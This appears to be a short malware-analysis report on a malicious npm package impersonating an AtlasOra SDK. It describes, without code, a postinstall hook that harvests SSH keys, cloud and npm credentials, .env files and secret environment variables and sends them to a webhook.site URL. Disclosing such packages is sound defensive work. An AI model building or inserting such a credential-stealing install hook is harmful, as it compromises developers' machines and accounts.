Package ships a postinstall hook (package.json scripts.postinstall: node install.js) that runs automatically on every npm install. install.js reads classic installer-secret paths — ~/.ssh/* (any file containing 'PRIVATE' or 'KEY'), ~/.aws/credentials, ~/.npmrc, and .env / .env.local / .env.production from the working directory — and bulk-scrapes 30+ environment variables shaped like credentials (PRIVATE_KEY, AWS_SECRET_ACCESS_KEY, JWT_SECRET, COINBASE_*, SUPABASE_SERVICE_ROLE_KEY, ANTHROPIC_*, etc.), plus host identity (os.hostname(), os.userInfo(), git config --list). The collected bundle is POSTed as JSON over HTTPS to a hardcoded anonymous webhook.site collection URL stored in a variable literally named EXFIL_SERVER. The package's index.js exports only a stub {version, name} — there is no real SDK functionality, despite the package name and description claiming to be the AtlasOra Web3 vacation-rental SDK. This is a brand-impersonation credential harvester targeting AtlasOra developers; any machine that runs npm install atlasora-sdk is fully compromised.